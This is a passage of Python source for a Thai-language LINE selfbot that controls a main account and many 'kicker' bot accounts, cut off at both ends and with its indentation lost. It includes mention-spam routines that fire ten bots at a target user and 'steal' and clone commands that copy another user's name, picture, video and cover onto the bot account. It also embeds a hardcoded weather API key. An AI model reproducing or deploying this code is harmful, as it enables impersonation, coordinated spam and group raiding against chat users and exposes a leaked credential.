def sendMention2(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker2.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker2.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention3(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker3.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker3.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention4(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker4.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker4.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention5(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker5.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker5.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention6(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker6.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker6.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention7(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker7.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker7.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention8(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker8.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker8.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention9(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker9.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker9.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention10(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker10.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker10.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention11(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker11.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker11.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention12(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker12.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker12.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention13(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker13.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker13.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention14(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker14.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker14.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention15(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker15.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker15.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention16(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker16.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker16.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention17(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker17.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker17.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention18(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker18.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker18.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention19(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker19.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker19.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention20(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker20.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker20.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def cloneProfile(myMid):
contact = line.getContact(myMid)
if contact.videoProfile == None:
line.cloneContactProfilev2(myMid)
else:
profile = line.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
line.updateProfile(profile)
pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = line.getProfileDetail(myMid)['result']['objectId']
line.updateProfileCoverById(coverId)
def backupProfile():
profile = line.getContact(myMid)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = line.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def restoreProfile():
profile = line.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
profile.pictureStatus = line.downloadFileURL("http://dl.profile.line-cdn.net/{}".format(settings["myProfile"]["pictureStatus"]), saveAs="tmp/backupPicture.bin")
line.updateProfilePicture(profile.pictureStatus)
line.updateProfile(profile)
else:
line.updateProfile(profile)
pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
line.updateProfileCoverById(coverId)
def time_converter(time):
converted_time = datetime.fromtimestamp(
int(time)
).strftime('%I:%M %p')
return converted_time
def url_builder(city_id):
user_api = '6975b23cef6c84e7f26062ef1c913c0d' # Obtain yours form: http://openweathermap.org/
unit = 'metric' # For Fahrenheit use imperial, for Celsius use metric, and the default is Kelvin.
api = 'http://api.openweathermap.org/data/2.5/weather?id=' # Search for your city ID here: http://bulk.openweathermap.org/sample/city.list.json.gz
full_api_url = api + str(city_id) + '&mode=json&units=' + unit + '&APPID=' + user_api
return full_api_url
def data_fetch(full_api_url):
url = urllib.request.urlopen(full_api_url)
output = url.read().decode('utf-8')
raw_api_dict = json.loads(output)
url.close()
return raw_api_dict
def data_organizer(raw_api_dict):
data = dict(
city=raw_api_dict.get('name'),
country=raw_api_dict.get('sys').get('country'),
temp=raw_api_dict.get('main').get('temp'),
temp_max=raw_api_dict.get('main').get('temp_max'),
temp_min=raw_api_dict.get('main').get('temp_min'),
humidity=raw_api_dict.get('main').get('humidity'),
pressure=raw_api_dict.get('main').get('pressure'),
sky=raw_api_dict['weather'][0]['main'],
sunrise=time_converter(raw_api_dict.get('sys').get('sunrise')),
sunset=time_converter(raw_api_dict.get('sys').get('sunset')),
wind=raw_api_dict.get('wind').get('speed'),
wind_deg=raw_api_dict.get('deg'),
dt=time_converter(raw_api_dict.get('dt')),
cloudiness=raw_api_dict.get('clouds').get('all')
)
return data
def data_output(to,data,prov):
m_symbol = ' °C'
if prov == 1:
line.sendMessage(to,"สภาพอากาศ: เชียงใหม่\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 2:
line.sendMessage(to,"สภาพอากาศ: อุบลราชธานี\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 3:
line.sendMessage(to,"สภาพอากาศ: กรุงเทพมหานคร\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 4:
line.sendMessage(to,"สภาพอากาศ: เพชรบูรณ์\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 5:
line.sendMessage(to,"สภาพอากาศ: ขอนแก่น\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 6:
line.sendMessage(to,"สภาพอากาศ: อยุธยา\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
def executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey):
if cmd == 'logoutbot':
line.sendMessage(to, 'Bot will logged out')
sys.exit('##----- PROGRAM STOPPED -----##')
elif cmd == 'logoutdevicee':
line.sendMessage(to, 'Bot will logged outdevicee')
line.logout()
sys.exit('##----- line LOGOUT -----##')
elif cmd == 'reboot':
line.sendMessage(to, 'กำลังรีสตาร์ท♪')
restartProgram()
elif cmd == 'help':
line.sendReplyMessage(msg_id,to,help(),{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
elif text.lower() == 'login':
os.system('log')
line.sendReplyMessage(msg_id,to," 「 Reset Login 」\nType: Reset Login\nระบบกำลังประมวลผล...",{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
python = sys.executable
os.execl(python, python, * sys.argv)
elif cmd == 'helpbot':
kicker.sendReplyMessage(msg_id, to, helpbot(),contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e5ee8776c4c58a0367a9455e4b60f80358c204u21d04f683a70e","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif"})
elif cmd == 'speed':
start = time.time()
sendMentionxd(msg.to, sender, "「เริ่มทดสอนความตาย」 ", "")
elapsed_time = time.time() - start
line.sendMessage(msg.to, " %s เร็วมากพอแล้ว" % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ")
elif text.lower() == 'myspeed':
time0 = timeit.timeit('"-".join(str(n) for n in range(100))', number=1000)
str1 = str(time0)
start = time.time()
line.sendMessage(to,'ความเร็วในการประมวลผล\n' + str1 + 'วินาที')
elapsed_time = time.time() - start
line.sendMessage(to,'การตอบสนองต่อคำสั่ง\n' + format(str(elapsed_time)) + 'วินาที')
elif cmd == 'me':
key1 = myMid
line.sendReplyMessage(msg_id, to, None, contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif",'mid': key1}, contentType=13)
elif cmd == "me2":
line.sendReplyMessage(msg_id,to, line.getContact(sender).displayName, contentMetadata = {'previewUrl': 'https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif', 'i-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'type': 'mt', 'subText': "", 'a-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'a-installUrl': ' line://app/1602687308-GXq4Vvk9?type=profile', 'a-packageName': 'line://app/1602687308-GXq4Vvk9?type=profile', 'countryCode': 'line://app/1602687308-GXq4Vvk9?type=profileID', 'a-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'i-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'id': 'line://app/1602687308-GXq4Vvk9?type=profile', 'text': 'รัตน์ไง', 'linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile'}, contentType=19)
elif cmd == 'ออน':
runtime = time.time() - programStart
line.sendMessage(to,format_timespan(runtime))
elif cmd == 'author':
line.sendMessage(to, 'Author is linepy')
elif cmd == 'me3':
line.sendReplyMessage(msg_id, to,"Fn",contentMetadata={'vCard': 'BEGIN:VCARD\r\nVERSION:3.0\r\nPRODID:ANDROID 8.13.3 Android OS 4.4.4\r\nFN:\\'+line.getContact(sender).displayName+'\nTEL;TYPE=mobile:'+line.getContact(sender).statusMessage+'\r\nN:?;\\,\r\nEND:VCARD\r\n', 'displayName': line.getContact(sender).displayName},contentType=13)
elif cmd == 'ข้อมูล':
try:
arr = []
owner = "uabeb419b286e211b3716ce5062dc19d0"
creator = line.getContact(owner)
contact = line.getContact(myMid)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = "____________________________\n❨🍒❩ ข้อมูลทั้งหมด ❨🍒❩\n____________________________"
ret_ += "\n┃❨🌷❩ Line Name : {}".format(contact.displayName)
ret_ += "\n┃❨🌷❩ Groups : {}".format(str(len(grouplist)))
ret_ += "\n┃❨🌷❩ Friends : {}".format(str(len(contactlist)))
ret_ += "\n┃❨🌷❩ Blocked : {}".format(str(len(blockedlist)))
ret_ += "\n┃❨🌷❩ Version1 : Python3 Update"
ret_ += "\n┃❨🌷❩ Version2 : Premium server"
ret_ += "\n┃❨🌷❩ Server : Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-33-generic x86_64)"
ret_ += "\n┃❨🌷❩ Edit : 14-11-2018"
ret_ += "\n┃❨🌷❩ Creator : {}".format(creator.displayName)
ret_ += "\n____________________________"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
elif cmd == 'ตั้งค่า':
res = '╭───🍁 เช็คการตั้งค่า 🍁'
res += '\n├👊Auto Add : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├👊Auto Join : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├👊Auto Respond : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├👊Auto Respond Mention : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├👊Auto Read : ' + bool_dict[settings['autoRead']][1]
res += '\n├👊Setting Key : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├👊Mimic : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├👊Greetings Join : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├👊Greetings Leave : ' + bool_dict[settings['greet']['leave']['status']][1]
res += '\n├👊Check Contact : ' + bool_dict[settings['checkContact']][1]
res += '\n├👊Check Post : ' + bool_dict[settings['checkPost']][1]
res += '\n├👊Check Sticker : ' + bool_dict[settings['checkSticker']][1]
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif cmd == 'abort':
aborted = False
if to in settings['changeGroupPicture']:
settings['changeGroupPicture'].remove(to)
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพกลุ่มเรียบร้อย')
aborted = True
if settings['changePictureProfile']:
settings['changePictureProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพโปรไฟล์เรียบร้อย')
aborted = True
if settings['changeCoverProfile']:
settings['changeCoverProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปปกเรียบร้อย')
aborted = True
if not aborted:
line.sendMessage(to, 'ไม่สามารถยกเลิกได้\nไม่มีอะไรไห้ยกเลิก')
elif cmd.startswith("midcopy "):
target = removeCmd("midcopy", text)
if target is not None:
cloneProfile(target)
line.sendContact(to,myMid)
line.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว")
elif cmd.startswith("ขโมย "):
if sender in myMid:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
if len(lists) != []:
ls = random.choice(lists)
cloneProfile(ls)
line.sendMessage(to,"🙄ได้ทำการขโมยบัญชีมึงเรียบร้อยแล้ว🙄")
elif cmd == "กลับคืน":
if sender in myMid:
try:
restoreProfile()
line.sendMessage(to, "🙄เรียกคืนสถานะบัญชีขโมยสำเร็จโปรดรอสักครู่🙄")
except Exception as e:
line.sendMessage(to, "ไม่สามารถเรียกคืนสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == "save":
if sender in myMid:
try:
backupProfile()
line.sendMessage(to, "บันทึกสถานะบัญชีเรียบร้อยแล้ว")
except Exception as e:
line.sendMessage(to, "ไม่สามารถบันทึกสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == 'speed2':
start = time.time()
sendMentionxd(msg.to, sender, "「เริ่มทดสอนความตาย」 ", "")
elapse = time.time() - start
line.sendMessage(to, ' %s เร็วมากพอแล้ว' % str(elapse),{'AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'รัตน์','AGENT_LINK': 'line://app/1608998163-Xxzr1PmV'})
elif cmd == 'หมู':
arr = []
mention = "@x\n"
text = msg.text[len("infome"):].strip()
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':myMid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,7,25)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = line.getAllContactIds()
gid = line.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
h = line.getContact(myMid)
line.reissueUserTicket()
My_Id = line.profile.displayName + "\nMy id Line: http://line.me/ti/p/" + line.getUserTicket().id
text += mention+"TIME : "+datetime.strftime(timeNow,'%H:%M:%S')+" Thailand\nMy Group : "+str(len(gid))+"\nMy Friend: "+str(len(teman))+"\nMy Mid : "+h.mid+"\nMy Name : "+My_Id
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
elif text.lower() == 'เปลี่ยนวีดีโอ':
if wait["selfbot"] == True:
if msg._from in admin:
line.sendMessage(to, "กรุณารอ20-30นาที")
picture = line.downloadFileURL("https://i.imgur.com/83Z5C2f.png", saveAs="image.png")
video = line.downloadFileURL("https://www.saveoffline.com/get/?i=eAQRQWRnY9Rs3RTdn3jZUV6sNVQkzqsJ&u=qQaKnkcoKrbhu8sr0CiqKlFxpiiOvHUX", saveAs="video.mp4")
changeVideoAndPictureProfile(picture, video)
line.sendMessage(to, "เปลี่ยนเรียบร้อย")
elif cmd == 'test':
line.sendTextWithFooter(to, "Footer message", footerIconURL="https://os.line.naver.jp/os/p/" + line.profile.mid, footerText="Footer", footerURL="https://line.me/ti/p/wprfnIo55O")
line.sendMessage(to, 'Your Test',{'AGENT_LINK': 'line://app/1608998163-Xxzr1PmV','AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'วิไล'})
elif cmd == "Devil":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention1(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention2(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention3(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention4(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention5(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention6(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention7(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention8(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention9(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
sendMention10(msg.to, sender, "☘ƑմçҟᎠҽѵìӀ☘ ", "")
elif cmd == "เข้าระบบ":
if wait["selfbot"] == True:
if msg._from in admin:
try:
sendMention1(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention2(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention3(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention4(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention5(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention6(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention7(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention8(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention9(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
sendMention10(msg.to, sender, "「เสร็จแล้ว」 ", "เข้าระบบ")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "ระบบคิก":
if wait["selfbot"] == True:
if msg._from in admin:
try:
kicker.sendMessage(msg.to,responsename1)
kicker2.sendMessage(msg.to,responsename2)
kicker3.sendMessage(msg.to,responsename3)
kicker4.sendMessage(msg.to,responsename4)
kicker5.sendMessage(msg.to,responsename5)
kicker6.sendMessage(msg.to,responsename6)
kicker7.sendMessage(msg.to,responsename7)
kicker8.sendMessage(msg.to,responsename8)
kicker9.sendMessage(msg.to,responsename9)
kicker10.sendMessage(msg.to,responsename10)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "คทบอท":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': myMid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
